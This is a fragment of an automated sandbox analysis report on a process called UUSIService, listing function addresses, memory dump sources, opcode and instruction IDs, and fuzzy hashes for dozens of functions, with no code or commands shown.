Instruction Fuzzy Hash: B3117331E1070A8BCB05EBB9D8644AEF7B5FFD9240710C71AE55A67204EF30A986C7D0

Function 013856F0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d154730342a8055b38a48ada80204ef5af9e98e139f6a85bd040fde03e5713c7
Instruction ID: f333622c2c994b8169eec57435597dfdc21aef5d6cc67a989f29480f24d20cdd
Opcode Fuzzy Hash: d154730342a8055b38a48ada80204ef5af9e98e139f6a85bd040fde03e5713c7
Instruction Fuzzy Hash: 4A119131E1070A8BCB05EBB8D8644AEF3B5FFD5200710C719E55A67204EF34A9858BD0

Function 013847EF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f373d6f9e1384bd7c3f3a9c93f987ff5324cc424071d6a4ae098a491b04507b
Instruction ID: 72d7916fef99fa9f56a14acff930b96d58a7739e7bd62c080421314147d0bdb8
Opcode Fuzzy Hash: 2f373d6f9e1384bd7c3f3a9c93f987ff5324cc424071d6a4ae098a491b04507b
Instruction Fuzzy Hash: 4E119131A1465ACFCB24EFACC4445ACBBF1EF89329B154298D042AF661C732ED41CF61

Function 0138768F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f37978d797e9763fee9bd9d3d5eab23202e72a47ae4612c579912ec02e29b61
Instruction ID: d69921559643a6d60a6ca180f350d0583e22072aff7c8213e3ffcc670006586f
Opcode Fuzzy Hash: 1f37978d797e9763fee9bd9d3d5eab23202e72a47ae4612c579912ec02e29b61
Instruction Fuzzy Hash: EE11C432D11749ABDF01DBB9DC441CCBBB5EFC6314F560AA1E101BB150EB74254AC7A0

Function 01380CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 054155bd1c8ab48016322fa091d44dcc6977f3f0fed37d6079a37e04c67adacf
Instruction ID: fc61b033b4d3b7e1f52ec561a6575b6be9c91d8c4f0e3850f5d51c9f0cfbfd98
Opcode Fuzzy Hash: 054155bd1c8ab48016322fa091d44dcc6977f3f0fed37d6079a37e04c67adacf
Instruction Fuzzy Hash: 35118E32D1170AABCB01CFB9D8400DDFBB2EF99320F254766E111B7650E774254ACB60

Function 01380989 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d845721c6392ecabb839f4f7c10e3956edb7a9435a7badc9c8ab0243757cb23
Instruction ID: ba16e568c2f20bdd262063f76b3b2d00922cbe831a071b50983b9c449c693a9f
Opcode Fuzzy Hash: 0d845721c6392ecabb839f4f7c10e3956edb7a9435a7badc9c8ab0243757cb23
Instruction Fuzzy Hash: 5C112E7860120BDFDB09FF74F868969BBB1FB54700B10466AD405CB279EB30A946CF80

Function 01380879 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac437dd360f1c23b9faf7ff17c64f92dfe9b41faa29ac1a57b160c8163d5e35a
Instruction ID: f3e9492c41efda829348b5653593213f6bb6d2c8162c4a302533767aca5de76a
Opcode Fuzzy Hash: ac437dd360f1c23b9faf7ff17c64f92dfe9b41faa29ac1a57b160c8163d5e35a
Instruction Fuzzy Hash: 5B019232D0460A9BCB01DBB9D8004DDFBB2EFDA310F1586A6D11177160FB70258ACBA0

Function 01384999 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e7805f45c27c2b04d861933f70ea413c131eba7c5e1dd664dddda538d9bcaaa
Instruction ID: 7e2608d839ac53cb12d0e3443c8664371736508bf11b16c4bef2b207ad9e20ff
Opcode Fuzzy Hash: 9e7805f45c27c2b04d861933f70ea413c131eba7c5e1dd664dddda538d9bcaaa
Instruction Fuzzy Hash: DB015E32D1060A9BCB00DBB9D8405DEF7B2EFC9310F258766D21577550EB74254A8BA1

Function 0120D161 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3376082998.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120d000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc120324b0bd8c838c962ff61f3110262550a4147be7a97a359158e1fcda5c8a
Instruction ID: 9f79091c606fab66488696a5579b61087c2ffbc6b0ff84a2be103f8a181da80b
Opcode Fuzzy Hash: cc120324b0bd8c838c962ff61f3110262550a4147be7a97a359158e1fcda5c8a
Instruction Fuzzy Hash: 9301F731116349AAF7128AE9CD80767FFA8EF40220F188619EE084A1C3CB789841C671

Function 01382188 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 315f346bf3005aa8412993c8aebf8b88e5a85c1d7b1ff916f66c8be2743e584c
Instruction ID: 452da47100de9ddb1d00926fb0d19d98843175b78cca41515c7d7858175aa842
Opcode Fuzzy Hash: 315f346bf3005aa8412993c8aebf8b88e5a85c1d7b1ff916f66c8be2743e584c
Instruction Fuzzy Hash: 90017531610305DBDB29AB58CC55BEA7772FB48358F50452DD5027B394DB75AC02CB91

Function 01380CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d366cf5cfca7361195246f1a30101d3bd6ca95ead20a27261b1f7da1debd1e7
Instruction ID: ddc897572e49aa5ce430f360d20e74d52a2cf3c46b9712b9a3f4e31fbaaf6c87
Opcode Fuzzy Hash: 9d366cf5cfca7361195246f1a30101d3bd6ca95ead20a27261b1f7da1debd1e7
Instruction Fuzzy Hash: FB011E32D1060EABCB04DFBAE8404DDFBB5EF99320F258766E11577650EB74258ACB60

Function 01384381 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ad16b3f7469a23987d4ae0895c497472ac4a56a1dc2d0a6085e2e50e1f2490
Instruction ID: f33defc24d7841dbc055569d9bff897e28ea8a2d4675c2e8ac33823fb0ea622e
Opcode Fuzzy Hash: 57ad16b3f7469a23987d4ae0895c497472ac4a56a1dc2d0a6085e2e50e1f2490
Instruction Fuzzy Hash: B5017C32D1061A97CF00DBB9D8405DEF7B2EFC9310F258666D61177560EB70258A8BA0

Function 01380998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c3ac9faaafea98b4c367637e98d97ef8ac48a215625827bc7259db35c1ab71
Instruction ID: 70aec1dfbfb0a37159f64d4dfef733c2f4d5afe89e2eaff811c5e3ae5dc225af
Opcode Fuzzy Hash: 09c3ac9faaafea98b4c367637e98d97ef8ac48a215625827bc7259db35c1ab71
Instruction Fuzzy Hash: EE11987860110BDFDB09FF64F8A8969BBB1FB54701B10466AD5059B279EB30AA46CF80

Function 01384C21 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d3d587367a0bb2df5f069aa5ad2af0d1c820c6dd707d32abff16660498a98d
Instruction ID: 06e314b89a4757b4c2ee0380f9b2c11484a6711197b0184dac6ace7fd910aa3e
Opcode Fuzzy Hash: 50d3d587367a0bb2df5f069aa5ad2af0d1c820c6dd707d32abff16660498a98d
Instruction Fuzzy Hash: 4C018F32D1060EABCB04DBB9E8405DEF7B6EFC5310F218766E52177560EB70254AC791

Function 01381C18 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a38d0b2a6037ca71ca527b64da7b96ff84c6732a94a67f1822b260b108fcf28a
Instruction ID: afa383341b50e5242d2420d73088c3b03402f376be573b69eacc1dcb02031ded
Opcode Fuzzy Hash: a38d0b2a6037ca71ca527b64da7b96ff84c6732a94a67f1822b260b108fcf28a
Instruction Fuzzy Hash: 6D017132E1460E9BCB00DBB9D8044DDFBB2EFDA311F258666E21177550EB74254ACBA1

Function 013830E4 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 251d7e16f6364994464eb9197e085d803b37849dd30e4d94239397a3fb9b0150
Instruction ID: e3c702370f6e8bb0b64cba61d655ec755761d424f8f22f07b72cd6ec7a137a33
Opcode Fuzzy Hash: 251d7e16f6364994464eb9197e085d803b37849dd30e4d94239397a3fb9b0150
Instruction Fuzzy Hash: B401287090524BDFEB05FBA4E86567D7B31FF50604F504659C0029B765DB34DA0B8741

Function 01382228 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 342e1694782d2deea7d730e27f1fa2c4fc44491d725ebb2be7253b2f308622d5
Instruction ID: 2ae3c4ad838a76517afcfcb85b628bc988b4cb8abdd8bb69ebcba8457e373292
Opcode Fuzzy Hash: 342e1694782d2deea7d730e27f1fa2c4fc44491d725ebb2be7253b2f308622d5
Instruction Fuzzy Hash: 58017132E1460E9BCB00DBBAD8044DDFBB2EFDA311F158766D61177550EB702589CBA1

Function 013876B7 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 200a81566e1b5e4f7b714ccb5dd284a6ba277b7384bd6aab6073ee51eceab8ec
Instruction ID: f040a8c2dd57f9f7035708bf38170e995c3a1e8b32234da6affa65190b978ebe
Opcode Fuzzy Hash: 200a81566e1b5e4f7b714ccb5dd284a6ba277b7384bd6aab6073ee51eceab8ec
Instruction Fuzzy Hash: 1E016D32D2061EABCF00DBB9DC446CDB7B6EFD9315F650B61E50177150EB74258A87A0

Function 013874AA Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f122c18f6bef98caec6ee08fdf2fc97d74456f50fd003ea01f2c774060c92715
Instruction ID: b2baa11147bbefc362cc51d010848eaae7d4cc165a83918ce8a9b399dd944041
Opcode Fuzzy Hash: f122c18f6bef98caec6ee08fdf2fc97d74456f50fd003ea01f2c774060c92715
Instruction Fuzzy Hash: 8D01D770A006198FCB09DF59D94885DFBF3BFC9214756C1A9C4099F266DB31EC02CB91

Function 01383CD0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 178c466e98f6994cb3c44c0cf5b829eecf4667366b2b43e90947e31453968bce
Instruction ID: cc184c8b45e3e1a14a94ed0e7e5e6589936a4ab03bb31b27a5ca6aa0e9de3119
Opcode Fuzzy Hash: 178c466e98f6994cb3c44c0cf5b829eecf4667366b2b43e90947e31453968bce
Instruction Fuzzy Hash: 4D016232E1060E97CF04DBBAD8404DEFBB6EFC9310F258756D61177554EB70258A8BA1

Function 01382F6E Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c7a04e2ef1bd259a84270065cbbd7150c9fddcc9fe45d10bf42c7d940532c9
Instruction ID: 76f3bf3f0602ecede997482dca6ad6a720e75d6494de1b071dbc70558d86f141
Opcode Fuzzy Hash: f2c7a04e2ef1bd259a84270065cbbd7150c9fddcc9fe45d10bf42c7d940532c9
Instruction Fuzzy Hash: 85018B32C2061AA7CB10DBB9EC445DEB7B6EFDA310F254B11E20077550EB70254AC791

Function 01382B49 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f907f2cc33ba74bae04d947fbc40c93cb225e3a6530f457abc35ac0ed28ef53
Instruction ID: c1c99a301163742dadc65830e5f195ab7d3d5198f44a180f6b7f70517e27d6d7
Opcode Fuzzy Hash: 3f907f2cc33ba74bae04d947fbc40c93cb225e3a6530f457abc35ac0ed28ef53
Instruction Fuzzy Hash: 31014F32C1074E9BCB00DBB9D8405DEBFB6EEC6320F664652D251775A1EB70218ACBA1

Function 01386D40 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea565a8d4c2c4bf6cfc199b61277fac9f31fdbba00980f2e2879c70b283e245e
Instruction ID: 944c475cced79de54d70e9db01de5a2e791d8ec32fd76c0fff1a15308445ba67
Opcode Fuzzy Hash: ea565a8d4c2c4bf6cfc199b61277fac9f31fdbba00980f2e2879c70b283e245e
Instruction Fuzzy Hash: 8E01243281061AA7CF00DBA9D8402CDB7B2EF99314F250661E60077150EB70364AC6A1

Function 01382BC9 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a418c8b16635c9634101d50e622d267e5ffc729440174a07879d3342dc78496
Instruction ID: d7cef6727f7e2c339d26720a5853c6fa19e19b19b554c2e5606a2950e9edb6c0
Opcode Fuzzy Hash: 9a418c8b16635c9634101d50e622d267e5ffc729440174a07879d3342dc78496
Instruction Fuzzy Hash: 6301A472A202499BDF15EBA4C4559EFBBF5AF84300F05882AC553A7340DE709A06DB92

Function 01380901 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1ff8e643d6f6a0c9ab83f6d95a57adcfb9468258c3ff401765df39b7ac5ea71
Instruction ID: fbc827de12dc36c64929dc4f0ad01417fb26f9fadd6f3efa2ef7e37ca46f4f4a
Opcode Fuzzy Hash: d1ff8e643d6f6a0c9ab83f6d95a57adcfb9468258c3ff401765df39b7ac5ea71
Instruction Fuzzy Hash: 6201A4729103499BDB05DF60C8559EFBBB6DF84320F114529D502AB250EF7599068BC1

Function 01380D51 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d34c8141b51e9b2c6c0446ae26ffe81f7657370fd5242c66f2a020843dea07d4
Instruction ID: 64fc372eb9edab3c5af97feb89a5e71a204637fd6897fa7286f5cab25569c1b8
Opcode Fuzzy Hash: d34c8141b51e9b2c6c0446ae26ffe81f7657370fd5242c66f2a020843dea07d4
Instruction Fuzzy Hash: B7012832A10249CBDB04DF74C815AEE7BF59F84314F048839D502AB340DE756906C7C1

Function 01386DC1 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d888e9ebea7df6881f183df9fae8998c83e58aabb7879e52c00aa3325ae228a
Instruction ID: 2e63e3f0eaa63e13be6c66391e512591f5146c7d8ed7a9c65f29d95bc175bbb4
Opcode Fuzzy Hash: 7d888e9ebea7df6881f183df9fae8998c83e58aabb7879e52c00aa3325ae228a
Instruction Fuzzy Hash: ACF02B72A1020997CF04EB64C9A6BEFBFB6DF84304F04452AD543B7380DE70690687D2

Function 01384C30 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f98e6add4a82557ebe13999f2412c6aed1e8c379da61a042bc553986927ddac0
Instruction ID: 6b0193158383a224b3a0f307e05d1b2d8f1e44655b8a344291d89bed6b8a9b31
Opcode Fuzzy Hash: f98e6add4a82557ebe13999f2412c6aed1e8c379da61a042bc553986927ddac0
Instruction Fuzzy Hash: 55016932D1060EABCB04DBB9E8404DEF7B6EFC5310F618766E52177660EB70254ACB90

Function 01387738 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf0e30ff6c1473a7dbdb0938fd01dddf383c70ef7773bab01fc279a2c0c5a7e
Instruction ID: 385570cfa549f3c9949d7458b69880b9130a4b8de1bee71bd9a3a56490ef13ea
Opcode Fuzzy Hash: 6bf0e30ff6c1473a7dbdb0938fd01dddf383c70ef7773bab01fc279a2c0c5a7e
Instruction Fuzzy Hash: 18F0F67291024A97DF04EB64C8A9BEFBBBADF84300F544826D913B7340EE705546C6D1

Function 0138170D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ea23922272530e187e09ae74c1becb935c3c2b6fd1b7eded3938dbf917864a
Instruction ID: e9ef72b67d41c99e323224ea33bd517afb81080d376c19a652c31a58644e783f
Opcode Fuzzy Hash: f4ea23922272530e187e09ae74c1becb935c3c2b6fd1b7eded3938dbf917864a
Instruction Fuzzy Hash: 19F0A4316193819FC706E77988104AE7BB2EEC225431545AEE40A8F296DF65AC0AC7D5

Function 01383D50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceeaca5f029878060dd3a951e67828bda764ad4c5090d5555f2733b6e940c5a6
Instruction ID: d354db82c0ad92544e950946a9eb016136f3ded20afa82ea62dba7e967879559
Opcode Fuzzy Hash: ceeaca5f029878060dd3a951e67828bda764ad4c5090d5555f2733b6e940c5a6
Instruction Fuzzy Hash: 39F0FC3291035957DB14DB60C455ADFBFF59F44710F05C42AD543B7741DE70A50A83C2

Function 01382198 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e885f9ee061308c6bd474d6068d9611f94a2cc54b4cccfd01d84a5de5e50452
Instruction ID: 29a056c92ce61d72557111195430d46377c619cd76ad0a3d6ed5c7f82ab081fc
Opcode Fuzzy Hash: 4e885f9ee061308c6bd474d6068d9611f94a2cc54b4cccfd01d84a5de5e50452
Instruction Fuzzy Hash: EF01FF31600319DBDB29AB68C814BAA77B6FB88348F10452DD5027B795CB75A845CB91

Function 01384409 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51dfd874f25c98757474f085f2add9350e8f0eafe76558016d47d1c105682a96
Instruction ID: efa4fb4e7a1b84dda452e5eeba96ed3ed3973b4e41d9df86a4f7c3e265e361d4
Opcode Fuzzy Hash: 51dfd874f25c98757474f085f2add9350e8f0eafe76558016d47d1c105682a96
Instruction Fuzzy Hash: 6EF0BB72E1020A97CB14DB68C8A5BDFBBFADF84314F55442AD542B7340EF70550687D1

Function 01381CA0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0946512e7b0892c42cf47a3be723de422efbeb49f4603aa677265de8386c867
Instruction ID: f87557ef508dc6ab0caf74774498d424cedef40c65dc0abc818c666c2342d10a
Opcode Fuzzy Hash: c0946512e7b0892c42cf47a3be723de422efbeb49f4603aa677265de8386c867
Instruction Fuzzy Hash: A7F0C272E1124A9BCF05EFB4C454AFEBBB59F58311F118939D502EB240EEB1590687C1

Function 01384CA8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b7f27c1e78b2dacfbde4c343b25d03194d23a128df59c974e35f86442e376b
Instruction ID: 5fc905436893df6913341af2b6000e786f6d8fa425b7729be4060e24f0e14a3d
Opcode Fuzzy Hash: d3b7f27c1e78b2dacfbde4c343b25d03194d23a128df59c974e35f86442e376b
Instruction Fuzzy Hash: 8AF0B432E1021A97CB09EF64C8A5BEFBBBADF84304F544426D653B7340EE70A90687D1

Function 01382FF0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed94407523685bc84194e3e745b0acbe1a289e68f8beeb9f5ea2fdb7fa99247
Instruction ID: c0216518cba3de7e61f11eabf4394b744e8111952f2663d333f9ac01e75e95c9
Opcode Fuzzy Hash: fed94407523685bc84194e3e745b0acbe1a289e68f8beeb9f5ea2fdb7fa99247
Instruction Fuzzy Hash: 63F0FC7191034AD7DB05DB64C8556EFBF759F84710F444529D542B7340DF71550787C2

Function 01384A21 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e259a7d85ceb988716924d88401244208e17436dabe649acedb4fd2e2e9247d
Instruction ID: 229924a880ecb3f3c0a99026202e9869cb79195549e3ae1a3f7c4445ba8fbcf6
Opcode Fuzzy Hash: 3e259a7d85ceb988716924d88401244208e17436dabe649acedb4fd2e2e9247d
Instruction Fuzzy Hash: 21F0967391024A97DF14DB74C865BDFBBB6DB84314F45492AD502BB340EEB0AA0687C6

Function 01384600 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46da4855408d6b7a48aedeac35ee068be9193bc653d9f128b57ca1ec345801fa
Instruction ID: 06387418130d04dd4e18dd82b8ed7163c63473fef0fc84889228c54728f5a30f
Opcode Fuzzy Hash: 46da4855408d6b7a48aedeac35ee068be9193bc653d9f128b57ca1ec345801fa
Instruction Fuzzy Hash: 9DF03C32D1070E96CB00DBBAD8444DEFBB6EFDA320F654651E61177550EB70228ACBA1

Function 01384678 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b4b1008a6330611d4d274764cb1d876aff9c355ca59d6b6ee0831c457538b7
